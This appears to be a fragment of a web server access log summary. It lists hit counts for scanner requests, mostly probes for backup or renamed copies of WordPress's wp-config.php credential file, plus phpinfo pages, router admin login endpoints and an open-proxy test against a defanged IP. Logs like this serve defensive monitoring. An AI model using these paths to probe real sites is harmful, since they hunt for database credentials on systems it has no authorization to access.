1 GET /wp-config.phpd HTTP/1.1
1 GET /wp-config.phpn HTTP/1.1
1 GET /wp-config.phpnew HTTP/1.1
1 GET /wp-config.phpold HTTP/1.1
1 GET /wp-config.phporiginal HTTP/1.1
1 GET /wp-config.phptmp HTTP/1.1
1 GET /wp-config.php~ HTTP/1.1
1 GET /wp-config.php~~~ HTTP/1.1
1 GET /wp-config.prod.php.txt HTTP/1.1
1 GET /wp-config.save HTTP/1.1
1 GET /wp-config.tar HTTP/1.1
1 GET /wp-config.temp HTTP/1.1
1 GET /wp-config.txt HTTP/1.1
1 GET /wp-config.zip HTTP/1.1
1 GET /wp-config_backup HTTP/1.1
1 GET /wp-config_good HTTP/1.1
1 GET /wp-config HTTP/1.1
1 GET /wp-configbak HTTP/1.1
1 GET /wp-config~ HTTP/1.1
1 GET /xampp/info.php HTTP/1.1
1 GET /xampp/phpinfo HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 HEAD / HTTP/1.0
1 POST /HNAP1/ HTTP/1.0
11 POST /boaform/admin/formLogin HTTP/1.1
4 PRI * HTTP/2.0